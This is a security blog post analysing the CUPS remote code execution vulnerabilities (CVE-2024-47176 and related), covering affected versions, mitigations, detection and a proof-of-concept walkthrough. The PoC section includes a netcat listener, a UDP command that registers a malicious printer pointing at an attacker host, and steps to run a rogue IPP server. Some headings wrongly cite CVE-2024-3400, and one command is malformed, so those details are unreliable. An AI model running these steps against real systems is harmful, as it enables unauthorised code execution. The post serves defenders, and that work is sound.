OpenPrinting CUPS RCE Analysis and POC - CVE-2024-47176

Berkay Soylu
Posted:
October 9, 2024
Home
Posts
Cybersecurity
OpenPrinting CUPS RCE Analysis and POC - CVE-2024-47176
Contents

CUPS, an open-source printing system, is vulnerable to multiple unauthenticated remote code execution vulnerabilities tracked as CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177. 

As you read you will also learn:

  • Vulnerability: Cups Vulnerabilities Analysis             
  • Introduction: Overview of CUPS, mention of SonicWall discovery
  • CUPS cves: Details on pre-authenticated RCE vulnerabilities.  
  • Severity & Affected Versions: Information on affected versions.
  • Exploitation Status: Vulnerability Exploitation In the Wild                     
  • Exploitation Overview: General overview of vulnerability and its impact   
  • Proof-of-Concept: Demonstration of exploit with a proof-of-concept       
  • Detection: Identifying Signs of Exploitation of CUPS vulnerabilities.  
  • Mitigations: Suggestions for mitigation for CUPS vulnerabilities  
  • Conclusion:  Summary of key findings and potential risks           
  • References: Citations and sources for further reading

TL;DR

This report focuses on the critical vulnerabilities in CUPS (Common Unix Printing System) identified as CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177. These vulnerabilities allow for remote code execution (RCE) and the injection of malicious code through the manipulation of Internet Printing Protocol (IPP) data. These flaws are found in key components of the CUPS system, affecting Unix-like operating systems such as Linux and macOS. Immediate patching and security mitigation strategies are essential to prevent exploitation.

Introduction

The Common Unix Printing System (CUPS) is an essential printing framework widely utilized in Unix-like operating systems, including various distributions of Linux and macOS. By implementing the Internet Printing Protocol (IPP), CUPS facilitates seamless printing services over local and networked environments, allowing users to manage and deploy printers efficiently.

In October 2024, security researchers revealed four critical vulnerabilities—CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177—that significantly threaten the integrity of systems running CUPS. These vulnerabilities primarily target key libraries and services such as libcupsfilters, libppd, and the cups-browsed service. The risks associated with these flaws are intensified by the fact that they allow attackers to remotely execute arbitrary code without requiring authentication, thus posing a severe threat to the confidentiality, integrity, and availability of the affected systems

The impact of these vulnerabilities is significant, as many organizations rely on CUPS for their printing infrastructure. Reports indicate that thousands of CUPS installations are publicly accessible, increasing the risk of exploitation.

By understanding the nature of these vulnerabilities and proactively addressing them, organizations can enhance their security posture and protect their systems from potential malicious attacks. This blog article aims to provide valuable insights into these vulnerabilities, enabling organizations to take the necessary steps to safeguard their infrastructure.

Severity & Affected Versions

The vulnerabilities CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177 are categorized as critical, with CVSS scores indicating their potential impact on affected systems. Specifically:

Versions Affected:

  • CVE-2024-47076 has a CVSS score of 8.6, representing a critical level of severity due to the ability of an attacker to send malicious IPP requests to manipulate printer settings and execute arbitrary code​
  • CVE-2024-47175 also scores 8.6, allowing for a similar type of remote code execution through crafted print job submissions, targeting vulnerabilities in the PPD file processing​
  • CVE-2024-47176 carries a CVSS score of 5.3, reflecting the potential for exploitation via the cups-browsed service
  • CVE-2024-47177 is another critical vulnerability, also scoring 9.0 (previously 9.9), as it allows attackers to bypass security measures by sending malformed IPP requests​

The vulnerabilities impact several versions of CUPS, particularly those released before the patches were applied. Notably, CUPS versions prior to 2.0.1 are vulnerable to these exploits. Users and administrators are strongly advised to check their installations against the following affected versions:

  • CVE-2024-47176: cups-browsed service versions through 2.0.1
  • CVE-2024-47076: libcupsfilters library versions through 2.1b1
  • CVE-2024-47175: libppd library versions through 2.1b1
  • CVE-2024-47177: cups-filters package versions through 2.0.1

Most Linux distributions, including Ubuntu, Debian, Fedora, and others that use CUPS, are affected.

Exploitation Status

The exploitation of CUPS vulnerabilities CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177 has been documented in the wild, with researchers and security analysts reporting limited but significant cases of active exploitation. These vulnerabilities allow attackers to remotely exploit the CUPS print service infrastructure, often leading to full system compromise due to the privileged nature of the CUPS daemon.

Mitigation

To protect against the CUPS vulnerabilities (CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, CVE-2024-47177):

Apply Security Patches: Update CUPS and related libraries to their latest versions using your system’s package manager.

sudo apt update && sudo apt upgrade

sudo systemctl restart cups.service

Regularly check for updates as new security fixes are released.

Disable the cups-browsed Service:

sudo systemctl stop cups-browsed

sudo systemctl disable cups-browsed

This ensures the service is not running and cannot be exploited.

Block Access to UDP Port 631

  • Update your firewall settings to block access to UDP port 631:

sudo ufw deny proto udp from any to any port 631

Firewall rules can be used to prevent access to the vulnerable services.

These actions will reduce exposure to the vulnerabilities while patches are being rolled out.

Analysis of CVE-2024-3400?

The core of the vulnerability involves exploiting CUPS by tricking it into generating a malicious PostScript Printer Description (PPD) file. This file contains attacker-controlled commands. When a print job is sent to the compromised printer, the command is executed with the privileges of the "lp" user (which is the user under which CUPS runs). While this user typically does not have elevated privileges, this method can be an entry point for further attacks.

Cups CVE Image

There are two primary methods to generate the malicious PPD file:

Local Network via mDNS: An attacker can use multicast DNS (mDNS) to automatically register a new printer or replace the PPD file of an existing printer. This requires the attacker to generate multicast datagrams and deliver them to the cups-browsed daemon on port 631. While multicast traffic doesn’t travel across the Internet, local network attacks are still significant, especially in unprotected environments.

Any Network via Legacy UDP Protocol: The attacker can also exploit a legacy UDP-based protocol to register a new printer with a malicious PPD file from any network, including over the Internet. This involves sending a crafted UDP datagram to port 631, which is processed by the cups-browsed service. Proper firewall configurations or a NAT router can mitigate this attack by blocking access to port 631.

Exploitation of CVE-2024-3400 (POC)

Exploiting the vulnerabilities tracked as CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177 involves tricking the CUPS system into processing malicious IPP (Internet Printing Protocol) attributes that lead to arbitrary code execution. Here's a closer look at how these vulnerabilities can be exploited:

Verifying Vulnerable Targets

To determine if a target CUPS instance is vulnerable, an attacker can set up a Netcat listener on their own machine. This can be done with the following command:

netcat -nvlp 4444

This command opens a listener on port 4444, waiting for any incoming connections.

Once the listener is set up, the attacker can send a specially crafted payload to the target CUPS instance's UDP service, typically operating on port 631. This is achieved using the following command:

echo '0 3 http://<attacker-ip>:<port>/printers/LetsDefend | nc -nu <target-ip> 631

In this command, replace <attacker-ip> with the attacker's IP address and <target-ip> with the target's IP address. The command sends a UDP packet that attempts to exploit the vulnerabilities in the CUPS service.

If the target is vulnerable, executing the initial command will trigger a callback to the attacker's listener, allowing them to capture any data sent back from the target system. This response can potentially contain sensitive information or confirmation of successful exploitation.

Setting Up the IPP Server

To exploit the CUPS vulnerabilities (CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177), you will need to set up an IPP (Internet Printing Protocol) server. You can use the ipp-server project available on GitHub. Follow these steps to get it running:

Ipp-server

Clone the Repository: Open your terminal and run:

git clone https://github.com/h2g2bob/ipp-server.git

Run the Server: After compiling, start the IPP server using the default configuration, which is usually adequate for testing:

python -m ippserver --port 1234 save /tmp/

Running the Exploit

Once the IPP server is running, the exploitation involves running a custom Python script that leverages the malicious behavior of the server. This script is designed to interact with the CUPS service and exploit the vulnerabilities identified.

You can modify the python script as you wish.

https://gist.github.com/stong/c8847ef27910ae344a7b5408d9840ee1 

By checking the localhost:631 on victim machine, you can see that the set up printer added to the “printers” section.

Once the user attempts to print using the malicious printer set up by the exploit, the malicious code embedded in the printer's attributes will execute on the target system. This happens because the printer attributes include commands defined in the exploit, which are processed by the target CUPS service when a print job is initiated.

Detection of CVE-2024-3400

Detecting exploitation of CUPS vulnerabilities such as CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177 involves a combination of log analysis, system behavior monitoring, and traffic inspection. Below are key strategies for detection:

1. Monitor CUPS Logs

The first line of defense is to inspect the CUPS log files (/var/log/cups/access_log, /var/log/cups/error_log) for any unusual activity, especially:

  • Requests or operations related to printers that were not manually configured.
  • Unauthorized or unusual printer registrations, especially those involving multicast DNS (mDNS) or unexpected UDP traffic.
  • Look for suspicious PPD file manipulations, especially if there are unexplained updates or replacements.

2. Network Traffic Monitoring

Set up network traffic monitoring tools to capture any suspicious UDP or mDNS traffic targeting port 631 (the port used by CUPS). Detecting unexpected or malicious datagrams, particularly from unfamiliar devices or networks, can help identify an attack.

3. Monitor Process Activity of “lp” User 

Since exploitation may allow execution of commands as the lp user, review activity by this user. Check for any unusual commands or file changes initiated by the lp user, especially outside of normal printing processes.

By regularly analyzing logs and monitoring network traffic, you can effectively detect attempts to exploit CUPS vulnerabilities and take action before serious damage occurs.

LetsDefend Simulated SOC Alerts

On the LetsDefend platform, you can practice by analyzing the latest zero-days in a realistic SOC environment. You can investigate EventID:307 - SOC329 - CUPS RCE Detection via IPP Injection (CVE-2024-47177) and learn how attackers exploit vulnerabilities to gain unauthorized access and execute malicious code.

https://app.letsdefend.io/alerts/307

Conclusion

The vulnerabilities in CUPS—CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177—pose a critical security threat to Unix-based systems. Attackers can exploit these flaws to gain remote access, control print jobs, and inject malicious code into affected systems. With many servers publicly exposed via the IPP protocol, the attack surface is broad, requiring organizations to act swiftly by updating vulnerable CUPS versions and tightening network security.

References

  • https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/
  • https://ubuntu.com/blog/cups-remote-code-execution-vulnerability-fix-available
  • https://threatprotect.qualys.com/2024/09/27/cups-printing-systems-remote-code-execution-vulnerability-cve-2024-47176-cve-2024-47076-cve-2024-47175-cve-2024-47177/
  • https://github.com/OpenPrinting/libcupsfilters/security/advisories/GHSA-w63j-6g73-wmg5
  • https://github.com/OpenPrinting/libppd/security/advisories/GHSA-7xfx-47qg-grp6
  • https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8
  • https://github.com/OpenPrinting/cups-filters/security/advisories/GHSA-p9rh-jxmq-gq47
  • https://ubuntu.com/security/CVE-2024-47076
  • https://ubuntu.com/security/CVE-2024-47175
  • https://ubuntu.com/security/CVE-2024-47176
  • https://ubuntu.com/security/CVE-2024-47177
  • https://ubuntu.com/security/notices/USN-7041-1
  • https://ubuntu.com/security/notices/USN-7042-1
  • https://ubuntu.com/security/notices/USN-7043-1
  • https://ubuntu.com/security/notices/USN-7044-1
  • https://ubuntu.com/security/notices/USN-7045-1
  • https://www.cve.org/CVERecord?id=CVE-2024-47076
  • https://www.cve.org/CVERecord?id=CVE-2024-47175
  • https://www.cve.org/CVERecord?id=CVE-2024-47176
  • https://www.cve.org/CVERecord?id=CVE-2024-47177

Share
letsdefend description card

You might also be interested in ...

Start learning cybersecurity today